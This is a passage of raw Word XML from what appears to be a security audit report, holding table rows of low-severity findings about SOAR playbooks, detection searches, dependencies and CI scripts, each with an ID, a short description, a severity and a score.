              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Low</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>3.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1373" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>CI/CD</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>DEP-09</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4320" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>SOAR playbooks declare no app versions and depend on unversioned community functions and platform-bundled libraries</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1147" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="4F81BD"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Low</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>3.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1373" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Dependencies</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>DEP-12</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4320" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Dependency-update automation does not cover pip or docker ecosystems; no SBOM produced with releases</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1147" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="4F81BD"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Low</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>3.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1373" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Dependencies</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>DET-08</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4320" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Malformed drilldown SPL in Copilot and Ollama detections (unbalanced quotes)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1147" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="4F81BD"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Low</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>3.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1373" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Detection content</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>PB1-09</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4320" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>CrowdStrike Dynamic Analysis URL scoring is dead code or crash-prone (wrong datapaths, zip order)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1147" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="4F81BD"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Low</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>3.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1373" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>SOAR playbooks</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>PB1-11</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4320" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Destructive leaf playbooks read raw unfiltered inputs, defeating the preceding filter</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1147" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="4F81BD"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Low</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>3.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1373" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>SOAR playbooks</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>PB1-13</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4320" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Account dispatch report/tagging logic flaws (only first user tagged, duplicated rows, None crash)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1147" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="4F81BD"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Low</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>3.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1373" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>SOAR playbooks</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>PB2-13</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4320" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Hard-coded placeholder email recipient and sender in email_notification_for_malware</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1147" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="4F81BD"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Low</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>3.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1373" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>SOAR playbooks</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>PB2-14</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4320" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Unsanitised artifact data in notification email body</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1147" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="4F81BD"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Low</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>3.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1373" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>SOAR playbooks</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>DET-12</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4320" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>map subsearches with non-attacker-controlled $token$ substitution (defence-in-depth)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1147" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="4F81BD"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Low</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>2.6</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1373" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Detection content</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>PB1-12</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4320" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Unguarded dict/list/regex access on connector and artifact data (crash / DoS)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1147" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="4F81BD"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Low</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>2.6</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1373" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>SOAR playbooks</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>PB1-14</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4320" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Shallow-copy bug mislabels interaction artifacts in Automated Email Investigation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1147" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="4F81BD"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Low</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>2.6</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1373" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>SOAR playbooks</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>PB1-15</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4320" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Super-linear regex on endpoint-controlled RTR stdout and invalid escape sequences</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1147" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="4F81BD"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Low</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>2.6</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1373" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>SOAR playbooks</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>CI-15</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4320" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Unbounded $ref recursion in validate_response_templates.py</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1147" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="4F81BD"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Low</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>2.3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1373" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>CI/CD</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>DET-09</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4320" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Drilldown tokens not produced by the detection search (102 dead pivots)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1147" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="4F81BD"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Low</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
